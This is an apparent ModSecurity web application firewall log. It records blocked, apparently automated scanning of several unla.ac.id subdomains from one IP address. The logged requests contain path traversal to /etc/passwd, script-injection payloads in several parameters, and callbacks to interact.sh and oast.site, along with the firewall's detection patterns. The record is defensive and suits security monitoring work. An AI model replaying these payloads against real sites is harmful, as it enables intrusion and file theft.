[Tue Aug 29 11:54:05.669281 2023] [:error] [pid 2609] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "www.unla.ac.id"] [uri "/loginsave.php"] [unique_id "ZO157cCo-f0AAAox7OQAAAAN"]
[Tue Aug 29 11:54:07.692503 2023] [:error] [pid 2646] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:logFile. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ....//....//....//....// found within ARGS:logFile: ....//....//....//....//etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/opm/read_sessionlog.php"] [unique_id "ZO1578Co-f0AAApWYzwAAAAM"]
[Tue Aug 29 11:54:08.175868 2023] [:error] [pid 2640] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:logFile. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ....//....//....//....// found within ARGS:logFile: ....//....//....//....//etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/opm/read_sessionlog.php"] [unique_id "ZO158MCo-f0AAApQ2YQAAAAb"]
[Tue Aug 29 11:54:08.183470 2023] [:error] [pid 2609] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:logFile. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ....//....//....//....// found within ARGS:logFile: ....//....//....//....//etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/opm/read_sessionlog.php"] [unique_id "ZO158MCo-f0AAAox7PcAAAAN"]
[Tue Aug 29 11:54:08.222646 2023] [:error] [pid 2651] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:logFile. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ....//....//....//....// found within ARGS:logFile: ....//....//....//....//etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/opm/read_sessionlog.php"] [unique_id "ZO158MCo-f0AAApbUQUAAAAh"]
[Tue Aug 29 11:54:08.224911 2023] [:error] [pid 2650] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:logFile. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ....//....//....//....// found within ARGS:logFile: ....//....//....//....//etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/opm/read_sessionlog.php"] [unique_id "ZO158MCo-f0AAApa-AwAAAAg"]
[Tue Aug 29 11:54:08.567111 2023] [:error] [pid 2635] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:size. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22></ found within ARGS:size: \\x22></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/wp-content/plugins/admin-font-editor/css.php"] [unique_id "ZO158MCo-f0AAApLWokAAAAI"]
[Tue Aug 29 11:54:08.568172 2023] [:error] [pid 2651] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:size. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22></ found within ARGS:size: \\x22></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/wp-content/plugins/admin-font-editor/css.php"] [unique_id "ZO158MCo-f0AAApbUQgAAAAh"]
[Tue Aug 29 11:54:08.568522 2023] [:error] [pid 2650] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:size. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22></ found within ARGS:size: \\x22></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/wp-content/plugins/admin-font-editor/css.php"] [unique_id "ZO158MCo-f0AAApa-A8AAAAg"]
[Tue Aug 29 11:54:08.568755 2023] [:error] [pid 2585] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:size. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22></ found within ARGS:size: \\x22></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/wp-content/plugins/admin-font-editor/css.php"] [unique_id "ZO158MCo-f0AAAoZ6YQAAAAK"]
[Tue Aug 29 11:54:08.671117 2023] [:error] [pid 2647] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:size. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22></ found within ARGS:size: \\x22></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/wp-content/plugins/admin-font-editor/css.php"] [unique_id "ZO158MCo-f0AAApXgaUAAAAU"]
[Tue Aug 29 11:54:08.698960 2023] [:error] [pid 2647] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:size. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22></ found within ARGS:size: \\x22></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/wp-content/plugins/admin-font-editor/css.php"] [unique_id "ZO158MCo-f0AAApXgaYAAAAU"]
[Tue Aug 29 11:54:08.745275 2023] [:error] [pid 2635] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:logFile. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ....//....//....//....// found within ARGS:logFile: ....//....//....//....//etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/opm/read_sessionlog.php"] [unique_id "ZO158MCo-f0AAApLWowAAAAI"]
[Tue Aug 29 11:54:09.614389 2023] [:error] [pid 2650] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:theme. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:theme: tes\\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/contact.php"] [unique_id "ZO158cCo-f0AAApa-BUAAAAg"]
[Tue Aug 29 11:54:09.616801 2023] [:error] [pid 2648] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:theme. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:theme: tes\\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/contact.php"] [unique_id "ZO158cCo-f0AAApYplsAAAAa"]
[Tue Aug 29 11:54:09.620705 2023] [:error] [pid 2645] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:theme. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:theme: tes\\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/contact.php"] [unique_id "ZO158cCo-f0AAApV2y4AAAAJ"]
[Tue Aug 29 11:54:09.626606 2023] [:error] [pid 2633] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:theme. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:theme: tes\\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/contact.php"] [unique_id "ZO158cCo-f0AAApJDYcAAAAY"]
[Tue Aug 29 11:54:09.975452 2023] [:error] [pid 2651] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:theme. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:theme: tes\\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/contact.php"] [unique_id "ZO158cCo-f0AAApbUQ4AAAAh"]
[Tue Aug 29 11:54:10.084450 2023] [:error] [pid 2646] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:theme. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:theme: tes\\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/contact.php"] [unique_id "ZO158sCo-f0AAApWY0oAAAAM"]
[Tue Aug 29 11:54:10.620651 2023] [:error] [pid 2645] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://www.interact.sh found within TX:1: www.interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "journal.unla.ac.id"] [uri "/index.php"] [unique_id "ZO158sCo-f0AAApV2zMAAAAJ"]
[Tue Aug 29 11:54:10.634793 2023] [:error] [pid 2648] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://www.interact.sh found within TX:1: www.interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "ft.unla.ac.id"] [uri "/index.php"] [unique_id "ZO158sCo-f0AAApYpmEAAAAa"]
[Tue Aug 29 11:54:10.673963 2023] [:error] [pid 2645] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://www.interact.sh found within TX:1: www.interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "informatika.unla.ac.id"] [uri "/index.php"] [unique_id "ZO158sCo-f0AAApV2zUAAAAJ"]
[Tue Aug 29 11:54:10.736863 2023] [:error] [pid 2645] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://www.interact.sh found within TX:1: www.interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "unla.ac.id"] [uri "/index.php"] [unique_id "ZO158sCo-f0AAApV2zcAAAAJ"]
[Tue Aug 29 11:54:10.992117 2023] [:error] [pid 2648] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://www.interact.sh found within TX:1: www.interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "pusatbahasa.unla.ac.id"] [uri "/index.php"] [unique_id "ZO158sCo-f0AAApYpm0AAAAa"]
[Tue Aug 29 11:54:11.195806 2023] [:error] [pid 2646] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:windowTitle. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ><!-- found within ARGS:windowTitle: AdministratorHelpWindow></TITLE></HEAD><body><script>alert(1337)</script><!--"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/sgdadmin/faces/com_sun_web_ui/help/helpwindow.jsp"] [unique_id "ZO1588Co-f0AAApWY1MAAAAM"]
[Tue Aug 29 11:54:11.539037 2023] [:error] [pid 2656] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:windowTitle. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ><!-- found within ARGS:windowTitle: AdministratorHelpWindow></TITLE></HEAD><body><script>alert(1337)</script><!--"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/sgdadmin/faces/com_sun_web_ui/help/helpwindow.jsp"] [unique_id "ZO1588Co-f0AAApgAw0AAAAH"]
[Tue Aug 29 11:54:11.540767 2023] [:error] [pid 2657] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:windowTitle. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ><!-- found within ARGS:windowTitle: AdministratorHelpWindow></TITLE></HEAD><body><script>alert(1337)</script><!--"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/sgdadmin/faces/com_sun_web_ui/help/helpwindow.jsp"] [unique_id "ZO1588Co-f0AAAph8s4AAAAj"]
[Tue Aug 29 11:54:11.680145 2023] [:error] [pid 2609] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:windowTitle. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ><!-- found within ARGS:windowTitle: AdministratorHelpWindow></TITLE></HEAD><body><script>alert(1337)</script><!--"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/sgdadmin/faces/com_sun_web_ui/help/helpwindow.jsp"] [unique_id "ZO1588Co-f0AAAox7QYAAAAN"]
[Tue Aug 29 11:54:11.790947 2023] [:error] [pid 2646] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://www.interact.sh found within TX:1: www.interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "www.unla.ac.id"] [uri "/index.php"] [unique_id "ZO1588Co-f0AAApWY1oAAAAM"]
[Tue Aug 29 11:54:12.131235 2023] [:error] [pid 2657] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:windowTitle. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ><!-- found within ARGS:windowTitle: AdministratorHelpWindow></TITLE></HEAD><body><script>alert(1337)</script><!--"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/sgdadmin/faces/com_sun_web_ui/help/helpwindow.jsp"] [unique_id "ZO159MCo-f0AAAph8tcAAAAj"]
[Tue Aug 29 11:54:12.131347 2023] [:error] [pid 2646] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:windowTitle. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ><!-- found within ARGS:windowTitle: AdministratorHelpWindow></TITLE></HEAD><body><script>alert(1337)</script><!--"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/sgdadmin/faces/com_sun_web_ui/help/helpwindow.jsp"] [unique_id "ZO159MCo-f0AAApWY14AAAAM"]
[Tue Aug 29 11:54:12.606362 2023] [:error] [pid 2656] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://cjmnijtjmimvgniikdb04mof4q41w3cng.oast.site found within TX:1: cjmnijtjmimvgniikdb04mof4q41w3cng.oast.site"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "pusatbahasa.unla.ac.id"] [uri "/"] [unique_id "ZO159MCo-f0AAApgAxQAAAAH"]
[Tue Aug 29 11:54:12.711641 2023] [:error] [pid 2656] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://cjmnijtjmimvgniikdb0x16h1rkwewpa4.oast.site found within TX:1: cjmnijtjmimvgniikdb0x16h1rkwewpa4.oast.site"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "informatika.unla.ac.id"] [uri "/"] [unique_id "ZO159MCo-f0AAApgAxcAAAAH"]
[Tue Aug 29 11:54:12.728340 2023] [:error] [pid 2609] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://cjmnijtjmimvgniikdb04wrtbmim7odt1.oast.site found within TX:1: cjmnijtjmimvgniikdb04wrtbmim7odt1.oast.site"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "journal.unla.ac.id"] [uri "/"] [unique_id "ZO159MCo-f0AAAox7REAAAAN"]
